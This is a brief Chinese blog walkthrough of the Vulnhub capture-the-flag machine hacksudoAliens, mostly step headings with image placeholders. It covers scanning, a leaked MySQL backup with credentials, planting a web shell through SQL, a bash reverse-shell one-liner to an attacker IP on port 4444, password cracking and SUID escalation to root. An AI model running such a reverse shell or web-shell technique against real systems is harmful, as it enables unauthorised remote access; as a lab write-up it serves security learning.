Vulnhub之hacksudoAliens

hacksudoAliens

一信息收集

IP 扫描

descript

descript

端口扫描

descript

开放端口 22 80 9000

80 访问

descript

扫描目录

descript

访问backup

descript

下载 查看mysql.bak

descript

发现密码 账户

user=vishal password=hacksudo

提权

访问 9000 登录

descript

用sql 写入木马 蚁件连接

descript

descript

反弹shell

bash -c 'exec bash -i &>/dev/tcp/10.4.7.150/4444 <&1'

descript

kali

descript

发现root密码但是加密了

descript

descript

爆破 把hacksudo 密码复制

descript

登录ssh

descript

查看权限和suid文件

descript

查看二进制文件

descript

提权方法

descript

提权到root

descript

查看flag

descript

descript

posted @ 2024-03-09 16:13  Eaglenine  阅读(16)  评论(0)    收藏  举报